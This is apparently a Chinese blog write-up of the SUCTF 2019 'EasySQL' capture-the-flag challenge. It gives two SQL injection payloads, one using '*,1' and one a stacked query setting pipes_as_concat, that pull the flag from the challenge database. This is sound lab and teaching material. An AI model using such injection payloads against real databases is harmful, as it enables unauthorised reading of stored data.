Web-[SUCTF 2019]EasySQL
打开后显示如下:
payload为数字时有回显,为字符串时没有回显
看大佬的wp得知,此时的内置sql语句为sql=“select”.post[‘query’]."||flag from Flag";
解法一
当payload为*,1时,执行的sql语句为select *,1||flag from Flag
相当于select 1 from Flag
于是
得到flag
解法二(预期解法)
payload为1;set sql_mode=pipes_as_concat;select 1
此时执行的语句为
select 1
set sql_mode=pipes_as_concat
select 1||flag from Flag
得到flag
【推荐】还在用 ECharts 开发大屏?试试这款永久免费的开源 BI 工具!
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· .NET制作智能桌面机器人:结合BotSharp智能体框架开发语音交互
· 软件产品开发中常见的10个问题及处理方法
· .NET 原生驾驭 AI 新基建实战系列:向量数据库的应用与畅想
· 从问题排查到源码分析:ActiveMQ消费端频繁日志刷屏的秘密
· 一次Java后端服务间歇性响应慢的问题排查记录
· 互联网不景气了那就玩玩嵌入式吧,用纯.NET开发并制作一个智能桌面机器人(四):结合BotSharp
· Vite CVE-2025-30208 安全漏洞
· 《HelloGitHub》第 108 期
· MQ 如何保证数据一致性?
· 一个基于 .NET 开源免费的异地组网和内网穿透工具